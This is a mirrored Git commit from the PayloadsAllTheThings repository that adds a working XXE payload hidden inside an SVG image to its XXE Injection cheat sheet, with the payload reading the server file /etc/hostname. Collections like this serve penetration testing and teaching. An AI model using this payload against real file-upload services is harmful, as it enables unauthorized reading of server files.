wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-24 14:16:22 +02:00
Code Issues Releases Activity

Add XXE payload inside SVG 

Source: https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload
This commit is contained in:
Techbrunch 2019-09-17 16:23:14 +02:00 committed by GitHub
parent a0917241ad
commit 8822199f65
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
XXE Injection/README.md
View File

@ -298,6 +298,14 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
</svg>
```
```
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
```
### XXE inside SOAP
```xml